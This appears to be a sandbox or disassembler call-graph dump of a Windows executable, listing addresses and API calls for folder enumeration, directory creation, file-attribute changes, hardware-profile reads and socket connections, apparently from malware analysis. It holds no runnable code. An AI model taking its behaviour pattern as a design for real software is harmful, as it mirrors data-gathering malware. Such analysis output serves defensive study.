73b2c 73000->73003 73008 74d3e CreateDirectoryA 73001->73008 73015 99b50 4 API calls 73002->73015 73009 32660 3 API calls 73003->73009 73006 74ce4 73004->73006 73007 73bb1 73004->73007 73005->72987 73010 32660 3 API calls 73006->73010 73018 99b50 4 API calls 73007->73018 73012 74f14 73008->73012 73013 74d4b 73008->73013 73009->72991 73010->72994 73014 72328 73011->73014 73016 32660 3 API calls 73012->73016 73019 99b50 4 API calls 73013->73019 73020 7233b CreateDirectoryA 73014->73020 73017 726b6 73015->73017 73016->72988 73025 726ca CreateDirectoryA 73017->73025 73021 73bec 73018->73021 73022 74d87 73019->73022 73023 72447 73020->73023 73024 7234c __fread_nolock 73020->73024 73028 73bfe CreateDirectoryA 73021->73028 73029 74d99 CreateDirectoryA 73022->73029 73034 99b50 4 API calls 73023->73034 73030 7235e SHGetFolderPathA 73024->73030 73026 726d5 73025->73026 73027 7282a 73025->73027 73036 32700 4 API calls 73026->73036 73038 99b50 4 API calls 73027->73038 73031 73d2e 73028->73031 73032 73c0b 73028->73032 73033 74ef3 73029->73033 73066 74da6 73029->73066 73035 72398 73030->73035 73044 99b50 4 API calls 73031->73044 73041 32700 4 API calls 73032->73041 73037 3c050 13 API calls 73033->73037 73042 74f06 73033->73042 73039 72479 73034->73039 73040 32700 4 API calls 73035->73040 73055 7270b 73036->73055 73037->73042 73043 72865 73038->73043 73046 7248d CreateDirectoryA 73039->73046 73045 723a4 73040->73045 73064 73c5c 73041->73064 73049 32660 3 API calls 73042->73049 73050 72879 CreateDirectoryA 73043->73050 73047 73d6e 73044->73047 73048 99c70 4 API calls 73045->73048 73051 725e0 73046->73051 73052 72498 __fread_nolock 73046->73052 73053 73d80 CreateDirectoryA 73047->73053 73054 723ba 73048->73054 73049->73012 73057 72884 73050->73057 73058 72c93 73050->73058 73056 725f5 73051->73056 73063 3c050 13 API calls 73051->73063 73059 724ab SHGetFolderPathA 73052->73059 73060 73d8d 73053->73060 73061 73e98 73053->73061 73062 32660 3 API calls 73054->73062 73069 99c70 4 API calls 73055->73069 73065 32660 3 API calls 73056->73065 73076 32700 4 API calls 73057->73076 73075 99b50 4 API calls 73058->73075 73067 724eb 73059->73067 73078 32700 4 API calls 73060->73078 73082 99b50 4 API calls 73061->73082 73068 723cc 73062->73068 73063->73056 73073 99c70 4 API calls 73064->73073 73070 72603 73065->73070 73071 32830 4 API calls 73066->73071 73077 32700 4 API calls 73067->73077 74507 3bf90 73068->74507 73072 7275a 73069->73072 73074 32660 3 API calls 73070->73074 73088 74e1c 73071->73088 73079 32660 3 API calls 73072->73079 73080 73c9f 73073->73080 73074->72998 73081 72cce 73075->73081 73093 728c5 73076->73093 73084 724f7 73077->73084 73104 73dc6 73078->73104 73086 7276c 73079->73086 73087 32660 3 API calls 73080->73087 73092 72ce2 CreateDirectoryA 73081->73092 73083 73ec2 73082->73083 73094 73ed4 CreateDirectoryA 73083->73094 73089 99c70 4 API calls 73084->73089 73106 32700 4 API calls 73086->73106 73091 73cb1 73087->73091 73099 99c70 4 API calls 73088->73099 73095 7250d 73089->73095 73090 723de 73113 3bf90 10 API calls 73091->73113 73097 72e60 73092->73097 73098 72ced 73092->73098 73108 99c70 4 API calls 73093->73108 73100 73ee1 73094->73100 73101 73fee 73094->73101 73103 32660 3 API calls 73095->73103 73117 99b50 4 API calls 73097->73117 73114 32700 4 API calls 73098->73114 73107 74e69 73099->73107 73126 32700 4 API calls 73100->73126 73123 99b50 4 API calls 73101->73123 73110 7251f 73103->73110 73118 99c70 4 API calls 73104->73118 73112 72784 73106->73112 73115 32660 3 API calls 73107->73115 73116 72908 73108->73116 73138 32700 4 API calls 73110->73138 73120 3bf00 7 API calls 73112->73120 73121 73cc3 73113->73121 73150 72d42 73114->73150 73124 74e7b 73115->73124 73125 32660 3 API calls 73116->73125 73128 72ea5 73117->73128 73129 73e09 73118->73129 73145 72789 73120->73145 73122 73d00 73121->73122 73136 95e10 4 API calls 73121->73136 73137 3c050 13 API calls 73122->73137 73142 73d07 73122->73142 73133 7402c 73123->73133 73147 3bf90 10 API calls 73124->73147 73134 7291a 73125->73134 73159 73f1c 73126->73159 73143 72eb9 CreateDirectoryA 73128->73143 73135 32660 3 API calls 73129->73135 73132 727ff 73140 3c050 13 API calls 73132->73140 73148 72803 73132->73148 73146 7403e CreateDirectoryA 73133->73146 73158 32700 4 API calls 73134->73158 73139 73e1b 73135->73139 73141 73cdf 73136->73141 73137->73142 73144 72537 73138->73144 73165 3bf90 10 API calls 73139->73165 73140->73148 73149 95e10 4 API calls 73141->73149 73161 32660 3 API calls 73142->73161 73151 72ec4 73143->73151 73152 7301b 73143->73152 73145->73132 73154 99b50 4 API calls 73145->73154 73155 7404b 73146->73155 73156 74718 73146->73156 73157 74e8d 73147->73157 73166 32660 3 API calls 73148->73166 73160 73cf4 73149->73160 73168 99c70 4 API calls 73150->73168 73169 99b50 4 API calls 73152->73169 73189 727d1 73154->73189 73163 74ec7 73157->73163 73170 95e10 4 API calls 73157->73170 73164 72932 73158->73164 73172 99c70 4 API calls 73159->73172 73161->73031 73174 3c050 13 API calls 73163->73174 73185 74ece 73163->73185 73171 3bf00 7 API calls 73164->73171 73175 73e2d 73165->73175 73166->73027 73176 72d85 73168->73176 73182 74ea7 73170->73182 73183 73f5f 73172->73183 73174->73185 73187 32660 3 API calls 73176->73187 73201 32660 3 API calls 73185->73201 73221 32660 3 API calls 73189->73221 73201->73033 73221->73132 73574 10c3b3 GetSystemTimePreciseAsFileTime 73573->73574 73575 3c083 73574->73575 73576 3c412 73575->73576 73577 3c08e 73575->73577 74637 10c05c 8 API calls 2 library calls 73576->74637 73578 3c418 73577->73578 73581 9d850 4 API calls 73577->73581 73580 32040 4 API calls 73578->73580 73587 3c336 73580->73587 73582 3c0ec FindFirstFileA 73581->73582 73582->73587 73592 3c15c 73582->73592 73583 112350 3 API calls 73585 3c422 73583->73585 73586 3c3d7 __Mtx_unlock 73586->72871 73587->73583 73587->73586 73588 9d850 4 API calls 73588->73592 73589 95b20 4 API calls 73589->73592 73590 95c90 3 API calls 73590->73592 73591 3c050 9 API calls 73591->73592 73592->73578 73592->73587 73592->73588 73592->73589 73592->73590 73592->73591 73593 3c2f1 FindNextFileA 73592->73593 73593->73592 73594 3c308 73593->73594 73594->73587 73595 3c326 SetFileAttributesA 73594->73595 73595->73587 74638 10f090 73598->74638 73600 413fd SHGetFolderPathA 73601 10f090 __fread_nolock 73600->73601 73602 4142a SHGetFolderPathA 73601->73602 74324->72945 74326 3f0d6 74325->74326 74327 3f654 74326->74327 74329 9d850 4 API calls 74326->74329 74328 32040 4 API calls 74327->74328 74330 3f659 74328->74330 74380 3f129 __Mtx_unlock 74329->74380 75490 10c05c 8 API calls 2 library calls 74330->75490 74332 112350 3 API calls 74334 3f664 __fread_nolock 74332->74334 74333 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 74333->74380 74337 32830 4 API calls 74334->74337 74335 3f638 74335->72945 74336 95c90 ExitProcess RtlAllocateHeap RtlFreeHeap 74336->74380 74338 3f739 74337->74338 74339 99c70 4 API calls 74338->74339 74340 3f74f 74339->74340 74341 3f780 74340->74341 74344 404a5 74340->74344 74343 10c3b3 GetSystemTimePreciseAsFileTime 74341->74343 74342 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 74342->74380 74348 112350 3 API calls 74344->74348 74354 10c3b3 GetSystemTimePreciseAsFileTime 74354->74380 74360 3f4d5 74360->74332 74360->74335 74374 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 74374->74380 74380->74327 74380->74330 74380->74333 74380->74336 74380->74342 74380->74354 74380->74360 74380->74374 74382 3f050 13 API calls 74380->74382 74382->74380 74496->72932 74497->72877 74498->72894 74499->72935 74500->72954 74501->72915 74502->72948 74503->72962 74504->72968 74505->72928 74506->72943 74508 10c3b3 GetSystemTimePreciseAsFileTime 74507->74508 74509 3bfa2 74508->74509 74510 3bffe 74509->74510 74513 3bfa9 74509->74513 74529 10c05c 8 API calls 2 library calls 74510->74529 74512 3c004 74514 3bfbd GetFileAttributesA 74513->74514 74515 3bfc9 __Mtx_unlock 74513->74515 74514->74515 74515->73090 74529->74512 74637->73578 74639 10f0a7 74638->74639 74639->73600 74639->74639 75490->74360 75499 98e60 75500 98e87 75499->75500 75501 98e77 75499->75501 75501->75500 75502 112350 3 API calls 75501->75502 75503 98e9c 75502->75503 75504 98f38 75503->75504 75511 10c162 75503->75511 75508 98ee2 75522 9af50 5 API calls 6 library calls 75508->75522 75510 98f02 75512 10c0be 75511->75512 75513 10c117 75512->75513 75516 112ef5 3 API calls 75512->75516 75517 98ed1 75512->75517 75519 10c11e 75513->75519 75523 112ef5 75513->75523 75515 10c13b 75515->75517 75518 116cd6 6 API calls 75515->75518 75516->75513 75517->75504 75521 97de0 ExitProcess RtlAllocateHeap RtlFreeHeap 75517->75521 75518->75519 75519->75517 75520 116788 7 API calls 75519->75520 75520->75517 75521->75508 75522->75510 75526 112e3e __fread_nolock 75523->75526 75524 112e51 75537 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 75524->75537 75526->75524 75528 112e71 75526->75528 75527 112e56 75538 112340 ExitProcess RtlAllocateHeap RtlFreeHeap __fread_nolock 75527->75538 75530 112e83 75528->75530 75531 112e76 75528->75531 75532 124228 2 API calls 75530->75532 75539 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 75531->75539 75534 112e8c 75532->75534 75536 112e61 75534->75536 75540 11addf RtlAllocateHeap RtlFreeHeap __dosmaperr 75534->75540 75536->75515 75537->75527 75538->75536 75539->75536 75540->75536 75541 993e0 75542 99423 75541->75542 75543 993ea 75541->75543 75543->75542 75544 112350 3 API calls 75543->75544 75545 9944b 75544->75545 75546 99540 4 API calls 75545->75546 75547 9946b 75546->75547 75550 994c0 ExitProcess RtlAllocateHeap RtlFreeHeap 75547->75550 75549 9948c 75550->75549 75551 11cdc2 75554 11cc32 75551->75554 75559 11cc5f std::locale::_Setgloballocale 75554->75559 75556 11cca8 75557 11ccae 75556->75557 75565 11ccc9 75556->75565 75561 11cac3 75559->75561 75562 11cacf __fread_nolock std::_Lockit::_Lockit 75561->75562 75568 11cb4a 75562->75568 75564 11cae6 std::locale::_Setgloballocale 75564->75556 75566 11ccd3 std::locale::_Setgloballocale 75565->75566 75567 11ccef ExitProcess 75566->75567 75570 11cb56 __fread_nolock std::locale::_Setgloballocale 75568->75570 75569 11cbba std::locale::_Setgloballocale 75569->75564 75570->75569 75572 11ffc4 RtlAllocateHeap RtlFreeHeap __EH_prolog3 std::locale::_Init std::locale::_Setgloballocale 75570->75572 75572->75569 75573 4a150 75574 4a1bf __fread_nolock 75573->75574 75575 4a47f 75574->75575 75576 4a2cf 75574->75576 75578 32040 4 API calls 75575->75578 75577 9d850 4 API calls 75576->75577 75579 4a2f5 75577->75579 75580 4a484 75578->75580 75581 95b90 4 API calls 75579->75581 75582 112350 3 API calls 75580->75582 75583 4a306 75581->75583 75590 4a3a2 75582->75590 75583->75580 75584 4a367 75583->75584 75635 32cc0 ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 75584->75635 75585 112350 3 API calls 75591 4a48e 75585->75591 75587 112350 3 API calls 75588 4c2fa 75587->75588 75589 4a462 75590->75585 75590->75589 75592 32830 4 API calls 75591->75592 75611 4c1ab Concurrency::cancel_current_task 75591->75611 75594 4a59c 75592->75594 75593 4c23d 75595 95e10 4 API calls 75594->75595 75596 4a5af 75595->75596 75597 3c430 4 API calls 75596->75597 75627 4a5be 75597->75627 75598 4c1a0 75599 98000 5 API calls 75598->75599 75599->75611 75600 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75600->75627 75601 93910 4 API calls 75601->75627 75603 4c1de 75604 32700 4 API calls 75603->75604 75605 4c1f1 75604->75605 75606 99c70 4 API calls 75605->75606 75608 4c1d2 75606->75608 75607 4c1ad 75610 32700 4 API calls 75607->75610 75609 38920 4 API calls 75608->75609 75609->75611 75612 4c1c0 75610->75612 75611->75587 75611->75593 75614 99c70 4 API calls 75612->75614 75613 4c2a4 75615 32700 4 API calls 75613->75615 75614->75608 75616 4c2b4 75615->75616 75618 99c70 4 API calls 75616->75618 75617 9a000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75617->75627 75618->75608 75619 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75619->75627 75620 3c430 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75620->75627 75621 98000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 75621->75627 75622 a9be0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75622->75627 75623 9be70 ExitProcess RtlAllocateHeap RtlFreeHeap 75623->75627 75624 92a50 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75624->75627 75625 92b60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75625->75627 75626 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 75626->75627 75627->75598 75627->75600 75627->75601 75627->75603 75627->75607 75627->75611 75627->75613 75627->75617 75627->75619 75627->75620 75627->75621 75627->75622 75627->75623 75627->75624 75627->75625 75627->75626 75628 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75627->75628 75629 4c29f 75627->75629 75631 94b50 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75627->75631 75632 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75627->75632 75633 442f0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap RtlAllocateHeap 75627->75633 75634 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75627->75634 75636 44090 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 75627->75636 75628->75627 75630 32040 4 API calls 75629->75630 75630->75613 75631->75627 75632->75627 75633->75627 75634->75627 75635->75590 75636->75627 75637 4dbb0 WSAStartup 75638 4dbe8 75637->75638 75639 4dca6 75637->75639 75638->75639 75640 4dc74 socket 75638->75640 75640->75639 75641 4dc8a connect 75640->75641 75641->75639 75642 4dc9c closesocket 75641->75642 75642->75639 75642->75640 75643 4df0969 75644 4df096e GetCurrentHwProfileW 75643->75644 75646 4df09c5 75644->75646 75647 7f190 75648 7f1b6 75647->75648 75649 8333b 75648->75649 75650 7f1e1 75648->75650 75720 32700 4 API calls 75648->75720 75723 5de70 15 API calls 75648->75723 75651 95e10 4 API calls 75650->75651 75652 95e10 4 API calls 75650->75652 75651->75650 75653 7f225 75652->75653 75654 7f26b 75653->75654 75656 7f27c 75654->75656 75655 32830 4 API calls 75655->75656 75656->75655 75657 32830 4 API calls 75656->75657 75658 7f2fb 75657->75658 75660 7f323 75658->75660 76561 82ec2 75658->76561 76562 5de70 75658->76562 75664 7f335 75660->75664 75661 95e10 4 API calls 75662 82ee3 75661->75662 75663 95e10 4 API calls 75662->75663 75671 82eff 75663->75671 75665 7f351 75664->75665 75666 95e10 4 API calls 75665->75666 75667 7f359 75666->75667 75668 7f370 75667->75668 75670 7f377 75668->75670 75669 32830 4 API calls 75669->75671 75672 95e10 4 API calls 75670->75672 75671->75669 75674 82fa0 75671->75674 75673 7f37f 75672->75673 75676 32700 4 API calls 75673->75676 75674->75674 75675 32830 4 API calls 75674->75675 75677 82fdd 75675->75677 75678 7f3b9 75676->75678 75679 5de70 15 API calls 75677->75679 75680 95e10 4 API calls 75677->75680 75681 32700 4 API calls 75678->75681 75679->75677 75686 83016 75680->75686 75682 7f3f8 75681->75682 75683 5de70 15 API calls 75682->75683 75685 7f40c 75683->75685 75684 95e10 4 API calls 75684->75686 75686->75684 75687 83060 75686->75687 75693 8307b 75687->75693 75689 32830 4 API calls 75689->75693 75693->75689 75700 83107 75693->75700 75697 32830 4 API calls 75697->75700 75699 5de70 15 API calls 75699->75700 75700->75697 75700->75699 75703 8313e 75700->75703 75705 8315a 75703->75705 75720->75648 75723->75648 76561->75661 76563 5dece __fread_nolock 76562->76563 76564 99c10 4 API calls 76563->76564 76565 5df05 76564->76565 76566 5df2d 76565->76566 76567 5ebb9 76565->76567 76568 95e10 4 API calls 76566->76568 76569 32700 4 API calls 76567->76569 76570 5df3e 76568->76570 76571 5ebc9 76569->76571 76572 50780 15 API calls 76570->76572 76620 94ab0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76571->76620 76574 5df49 76572->76574 76578 5df5c 76574->76578 76617 5df7c std::_Locinfo::_Locinfo_ctor 76574->76617 76575 5ebdf 76576 32660 3 API calls 76575->76576 76577 5ebb7 76576->76577 76584 32700 4 API calls 76577->76584 76618 5ec44 std::_Locinfo::_Locinfo_ctor 76577->76618 76580 98000 5 API calls 76578->76580 76579 5ebab 76581 98000 5 API calls 76579->76581 76583 5df61 76580->76583 76581->76577 76582 5fbf0 76587 98000 5 API calls 76582->76587 76585 98000 5 API calls 76583->76585 76586 5ec1f 76584->76586 76588 5df6c 76585->76588 76621 94ab0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76586->76621 76597 5df77 76587->76597 76590 32660 3 API calls 76588->76590 76590->76597 76591 5ec35 76593 5fd46 76595 32040 4 API calls 76593->76595 76594 112350 3 API calls 76596 5fd50 76594->76596 76595->76597 76597->76594 76598 5fd29 76597->76598 76598->75658 76599 99b50 4 API calls 76599->76617 76600 95b90 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76600->76617 76601 9bc40 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76601->76618 76602 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76602->76618 76603 9d660 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76603->76618 76604 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76604->76617 76605 99d70 4 API calls 76605->76617 76606 95b20 4 API calls 76606->76618 76607 9bc40 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76607->76617 76608 95b20 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76608->76617 76609 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 76609->76617 76610 3bf00 7 API calls 76610->76617 76611 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76611->76618 76612 a2170 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76612->76618 76613 3bf00 7 API calls 76613->76618 76614 5fd60 ExitProcess RtlAllocateHeap RtlFreeHeap 76614->76618 76615 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76615->76617 76617->76579 76617->76593 76617->76597 76617->76599 76617->76600 76617->76604 76617->76605 76617->76607 76617->76608 76617->76609 76617->76610 76617->76615 76619 a2b20 4 API calls 3 library calls 76617->76619 76618->76582 76618->76593 76618->76597 76618->76601 76618->76602 76618->76603 76618->76606 76618->76611 76618->76612 76618->76613 76618->76614 76619->76617 76620->76575 76621->76591 76622 83910 76623 83950 76622->76623 76624 99b50 4 API calls 76623->76624 76625 8467b 76623->76625 76627 84e8e 76623->76627 76626 839b9 76624->76626 76628 99b50 4 API calls 76625->76628 76631 3bf90 10 API calls 76626->76631 76633 99b50 4 API calls 76627->76633 76636 85024 76627->76636 76630 846c2 76628->76630 76629 8519c 76818 925c0 ExitProcess RtlAllocateHeap RtlFreeHeap 76629->76818 76637 112f00 3 API calls 76630->76637 76639 839d2 76631->76639 76635 84f0c 76633->76635 76634 851aa 76643 112f00 3 API calls 76635->76643 76636->76629 76640 99b50 4 API calls 76636->76640 76638 846d6 76637->76638 76641 32660 3 API calls 76638->76641 76644 839ea 76639->76644 76737 3c010 76639->76737 76645 850b1 76640->76645 76651 846e9 76641->76651 76646 84f20 76643->76646 76648 84669 76644->76648 76654 8405c 76644->76654 76745 9a1b0 76644->76745 76650 112f00 3 API calls 76645->76650 76649 32660 3 API calls 76646->76649 76652 32660 3 API calls 76648->76652 76660 84f33 76649->76660 76655 850c5 76650->76655 76651->76627 76656 32be0 6 API calls 76651->76656 76652->76625 76653 84648 76653->76648 76662 3c050 13 API calls 76653->76662 76654->76653 76657 9a1b0 4 API calls 76654->76657 76659 32660 3 API calls 76655->76659 76664 84702 76656->76664 76735 84088 76657->76735 76658 8404d 76764 4c300 ExitProcess RtlAllocateHeap RtlFreeHeap 76658->76764 76666 850d8 76659->76666 76660->76636 76663 32be0 6 API calls 76660->76663 76662->76648 76689 84f4c 76663->76689 76667 9a1b0 4 API calls 76664->76667 76673 84ab8 76664->76673 76665 84639 76767 4c300 ExitProcess RtlAllocateHeap RtlFreeHeap 76665->76767 76666->76629 76669 32be0 6 API calls 76666->76669 76715 84728 76667->76715 76668 8501e 76671 116788 7 API calls 76668->76671 76683 850f1 76669->76683 76671->76636 76672 84e88 76675 116788 7 API calls 76672->76675 76673->76672 76770 9d110 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 76673->76770 76675->76627 76676 85196 76678 116788 7 API calls 76676->76678 76677 84adf 76771 a9be0 76677->76771 76678->76629 76679 84aa9 76769 4c300 ExitProcess RtlAllocateHeap RtlFreeHeap 76679->76769 76683->76676 76687 32be0 6 API calls 76683->76687 76685 84e79 76687->76683 76689->76668 76690 32be0 6 API calls 76689->76690 76690->76689 76691 92b60 4 API calls 76691->76735 76693 92b60 4 API calls 76693->76715 76695 92b60 4 API calls 76721 84afb 76695->76721 76696 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76696->76735 76697 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76697->76715 76698 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76726 83a1a 76698->76726 76699 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76699->76721 76700 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76700->76726 76701 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 76701->76726 76702 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76702->76735 76703 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76703->76735 76704 3c010 10 API calls 76704->76726 76705 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76705->76715 76706 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 76706->76715 76707 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76707->76726 76708 32700 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76708->76726 76709 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76709->76721 76710 a0ef0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76710->76715 76711 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76711->76721 76712 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 76712->76721 76715->76679 76715->76693 76715->76697 76715->76705 76715->76706 76715->76710 76717 32be0 6 API calls 76715->76717 76768 97330 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 76715->76768 76716 3bf00 7 API calls 76716->76726 76717->76715 76718 3c010 10 API calls 76718->76735 76719 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76719->76735 76720 99c10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76720->76735 76721->76685 76721->76695 76721->76699 76721->76709 76721->76711 76721->76712 76722 32be0 6 API calls 76721->76722 76816 97330 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 76721->76816 76722->76721 76723 99c10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76723->76726 76724 112f00 ExitProcess RtlAllocateHeap RtlFreeHeap 76724->76726 76726->76658 76726->76698 76726->76700 76726->76701 76726->76704 76726->76707 76726->76708 76726->76716 76726->76723 76726->76724 76727 32be0 6 API calls 76726->76727 76730 3bf90 10 API calls 76726->76730 76734 116788 7 API calls 76726->76734 76750 97330 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 76726->76750 76751 92b60 76726->76751 76762 3c730 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76726->76762 76763 98730 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Locinfo::_Locinfo_ctor 76726->76763 76727->76726 76728 3bf90 10 API calls 76728->76735 76729 3bf00 7 API calls 76729->76735 76730->76726 76731 112f00 ExitProcess RtlAllocateHeap RtlFreeHeap 76731->76735 76732 32be0 6 API calls 76732->76735 76733 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 76733->76735 76734->76726 76735->76665 76735->76691 76735->76696 76735->76702 76735->76703 76735->76718 76735->76719 76735->76720 76735->76728 76735->76729 76735->76731 76735->76732 76735->76733 76736 116788 7 API calls 76735->76736 76765 97330 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 76735->76765 76766 98730 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Locinfo::_Locinfo_ctor 76735->76766 76736->76735 76738 10c3b3 GetSystemTimePreciseAsFileTime 76737->76738 76739 3c01d 76738->76739 76740 3c024 CreateDirectoryA 76739->76740 76741 3c03f 76739->76741 76742 3c038 __Mtx_unlock 76740->76742 76819 10c05c 8 API calls 2 library calls 76741->76819 76742->76644 76744 3c045 76746 10ce31 std::_Facet_Register 4 API calls 76745->76746 76747 9a1f4 76746->76747 76748 a9be0 4 API calls 76747->76748 76749 9a21e 76748->76749 76749->76726 76750->76726 76752 92bbc 76751->76752 76756 92b85 Concurrency::cancel_current_task 76751->76756 76753 32700 4 API calls 76752->76753 76754 92bc9 76753->76754 76820 38740 4 API calls 2 library calls 76754->76820 76757 92b95 76756->76757 76758 32700 4 API calls 76756->76758 76757->76726 76759 92bff 76758->76759 76821 38740 4 API calls 2 library calls 76759->76821 76761 92c17 Concurrency::cancel_current_task 76762->76726 76763->76726 76764->76654 76765->76735 76766->76735 76767->76653 76768->76715 76769->76673 76770->76677 76772 a9c1f 76771->76772 76773 a9dd6 76771->76773 76774 10ce31 std::_Facet_Register 4 API calls 76772->76774 76775 32700 4 API calls 76773->76775 76798 a9c34 76774->76798 76776 a9de4 76775->76776 76777 99c70 4 API calls 76776->76777 76779 a9df9 76777->76779 76778 a9d6f 76780 a9d89 76778->76780 76835 9be70 76778->76835 76782 38920 4 API calls 76779->76782 76784 9be70 3 API calls 76780->76784 76781 93910 4 API calls 76781->76798 76785 a9e0e Concurrency::cancel_current_task 76782->76785 76786 a9db6 76784->76786 76788 112350 3 API calls 76785->76788 76786->76721 76787 95e10 4 API calls 76787->76798 76789 a9e24 76788->76789 76840 ab320 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Locinfo::_Locinfo_ctor 76789->76840 76793 a9e59 76801 a9ef6 76793->76801 76814 a9ecf 76793->76814 76841 ab1c0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Locinfo::_Locinfo_ctor 76793->76841 76842 ab060 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Locinfo::_Locinfo_ctor 76793->76842 76843 a6cf0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76793->76843 76798->76778 76798->76781 76798->76785 76798->76787 76822 ae2d0 76798->76822 76801->76814 76816->76721 76818->76634 76819->76744 76820->76756 76821->76761 76823 ae302 76822->76823 76824 ae315 76823->76824 76825 ae338 76823->76825 76826 ae3c3 76823->76826 76824->76798 76828 10ce31 std::_Facet_Register 4 API calls 76825->76828 76850 37d60 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76826->76850 76830 ae352 76828->76830 76829 ae3c8 76831 11b376 __freea 2 API calls 76829->76831 76832 95e10 4 API calls 76830->76832 76836 9beb3 76835->76836 76839 9be83 76835->76839 76836->76780 76837 9be70 3 API calls 76837->76839 76839->76836 76839->76837 76851 a3520 76839->76851 76840->76793 76841->76793 76842->76793 76843->76793 76850->76829 76852 a352b 76851->76852 76853 a354e 76852->76853 76854 112350 3 API calls 76852->76854 76853->76839 76856 852b0 77153 852f3 __Mtx_unlock 76856->77153 76857 8530b 76858 99b50 4 API calls 76857->76858 76860 87424 76858->76860 76859 99b50 4 API calls 76859->77153 76861 3bf90 10 API calls 76860->76861 76862 8743d 76861->76862 76863 8744e CreateDirectoryA 76862->76863 76866 8745d 76862->76866 76864 88053 76863->76864 76863->76866 76867 32660 3 API calls 76864->76867 76865 88038 76865->76864 76869 3c050 13 API calls 76865->76869 76866->76865 76868 9a1b0 4 API calls 76866->76868 76870 88061 76867->76870 77056 87485 __Mtx_unlock 76868->77056 76869->76864 76871 88029 77278 4c300 ExitProcess RtlAllocateHeap RtlFreeHeap 76871->77278 76874 882c7 76876 112350 3 API calls 76874->76876 76875 3c050 13 API calls 76875->77153 76877 882cc 76876->76877 77280 10c05c 8 API calls 2 library calls 76877->77280 76879 882d2 76880 32040 4 API calls 76879->76880 76881 882d7 76880->76881 76882 112350 3 API calls 76881->76882 76886 882dc 76882->76886 76883 92a50 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 76883->77153 76884 9a1b0 4 API calls 76884->77056 76885 9a1b0 